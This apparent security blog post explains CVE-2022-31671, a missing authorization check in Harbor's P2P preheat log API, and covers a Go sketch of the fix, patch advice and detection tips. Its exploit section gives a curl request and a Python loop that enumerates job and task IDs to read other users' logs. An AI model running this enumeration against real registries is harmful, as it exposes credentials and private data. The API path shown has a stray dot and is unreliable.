In today’s world, container registries like VMware Harbor are the backbone of cloud-native development. Harbor is valued for its security features, but even the best systems have weak spots. In 2022, security researchers discovered a serious flaw: CVE-2022-31671. This issue lets a malicious user with Harbor access read any job log stored in the database — even privileged ones — just by tweaking a request. If you run Harbor, you must understand this vulnerability.
This article will break down how the bug works, show you example exploit code, and guide you to trusted resources. Whether you’re a DevOps engineer or a security beginner, this guide will help you grasp why CVE-2022-31671 is dangerous and what to do about it.
What is Harbor?
Harbor is an open-source cloud-native registry that stores, signs, and scans container images. It supports key features like access control, image vulnerability scanning, and auditing—all important for keeping your supply chain secure.
About CVE-2022-31671
Advisory summary:
*Harbor fails to check user permissions when reading or updating execution logs for P2P preheat jobs. Any authenticated Harbor user can specify any preheat job ID and gain access to all execution logs, potentially exposing secrets or proprietary details.*
Original reference: NVD National Vulnerability Database - CVE-2022-31671
Discovered by:
Shimo Yanagisawa (Credit via vendor's advisory)
What is a P2P Preheat Job?
Harbor allows images to be *preheated* using peer-to-peer (P2P) distribution (think: pre-caching images). Each preheat job keeps logs to help admins debug or audit what's happened. Ordinarily, only authorized users should see these logs.
The Real Problem
Harbor’s API did not check if a user actually had permission to view or modify a particular job’s logs. The server took the job's ID from the request path and returned—or allowed you to update—the log content with no further permission check.
In practice, an authenticated user could:
- List all jobs to get their IDs
- Use the API to request the log for any job, including jobs belonging to other projects or higher-privilege users
This could expose sensitive info like deployment details, environment variables, credentials, and more.
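To make the missing check concrete, here is an added Go sketch (my own illustration, not Harbor's code or its actual patch) showing the vulnerable lookup beside a hardened one that first resolves the execution to its owning project and then checks the caller's membership. The Execution and Store types, the two users and the sample log lines are constructed for the demo.

```go
package main

import "errors"

// Execution stands in for a preheat execution record (not Harbor's type); its log belongs to a project.
type Execution struct {
	ProjectID int
	Log       string
}

// Store is an in-memory stand-in for the database plus project membership.
type Store struct {
	executions map[int]Execution
	members    map[string]map[int]bool // user -> project IDs the user may read
}

var ErrNotFound = errors.New("execution not found")
// VulnerableGetLog mirrors the flaw: look up the path ID, return its log, never consult the caller.
func (s *Store) VulnerableGetLog(_ string, execID int) (string, error) {
	e, ok := s.executions[execID]
	if !ok {
		return "", ErrNotFound
	}
	return e.Log, nil
}

// GetLog is the hardened form: resolve the execution to its owning project,
// then require the caller's membership before returning any log content.
func (s *Store) GetLog(user string, execID int) (string, error) {
	e, ok := s.executions[execID]
	if !ok {
		return "", ErrNotFound
	}
	if !s.members[user][e.ProjectID] { // a nil inner map reads as false
		// Same error as a missing ID, so an unauthorized caller learns nothing about which IDs exist.
		return "", ErrNotFound
	}
	return e.Log, nil
}

// NewDemoStore builds constructed sample data: two projects, two users.
func NewDemoStore() *Store {
	return &Store{
		executions: map[int]Execution{
			1: {ProjectID: 10, Log: "project 10: preheat pulled image with registry credentials"},
			2: {ProjectID: 20, Log: "project 20: preheat finished"},
		},
		members: map[string]map[int]bool{"alice": {10: true}, "bob": {20: true}},
	}
}
```

With the demo data, bob can read project 10's log through VulnerableGetLog but gets "not found" from GetLog, while alice still reads her own project's log.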
Step-by-Step Exploit Example
Suppose you're an authenticated user on a Harbor instance at https://harbor.company.com. You want to read logs for a job you aren’t authorized to view.
1. Get Another Job’s ID
If job IDs are predictable (like 1, 2, 3...), or if you can list them elsewhere, pick one you shouldn’t see.
The affected API route, based on Harbor's implementation, looks like this:

```
GET /api/v2./p2p/preheat/executions/{execution_id}/tasks/{task_id}/logs
```

Just replace {execution_id} and {task_id} with numbers.
Here's a sample with curl:

```bash
curl -k -u "attacker:password" \
  "https://harbor.company.com/api/v2./p2p/preheat/executions/1/tasks/1/logs"
```
You could keep cycling through IDs (2, 3, ...) until you find juicy logs.
Note: Some setups may require you to first trigger jobs or list tasks, but if you know the pattern, trial and error could work.
Example Snippet: Fast Enumeration in Python
Below is a simple example script to try reading execution logs from various job/task IDs.

```python
import requests

# CHANGE THESE!
BASE_URL = "https://harbor.company.com"
USERNAME = "attacker"
PASSWORD = "password"

session = requests.Session()
session.auth = (USERNAME, PASSWORD)

for execution_id in range(1, 20):  # Try various job IDs
    for task_id in range(1, 5):  # And possible task IDs per job
        endpoint = f"/api/v2./p2p/preheat/executions/{execution_id}/tasks/{task_id}/logs"
        resp = session.get(BASE_URL + endpoint, verify=False)
        if resp.status_code == 200 and resp.text.strip():
            print(f"[+] Found logs at {endpoint}:\n{resp.text}\n")
        elif resp.status_code != 404:
            print(f"[-] {endpoint} returned {resp.status_code}")
```
Patch: Upgrade to Harbor 2.5.6, 2.6.3, or 2.7. (and newer) where this is fixed.
References
- NVD: CVE-2022-31671
- GitHub Advisory: goharbor/harbor GHSA-546m-x9r7-23ww
- Harbor Release Notes
- Common Harbor API Reference
Summary
CVE-2022-31671 showed that even advanced open-source projects can have basic permission flaws. If you use Harbor and haven't patched, you're at risk of user data disclosure through job logs. Always keep your registry up to date, audit your user base, and keep an eye on access logs for suspicious requests, for example a single account requesting preheat logs for many sequential execution IDs it has no project membership for.
If you found this post valuable, consider sharing with your team or community to keep everyone secure!
Timeline
Published on: 11/14/2024 12:15:17 UTC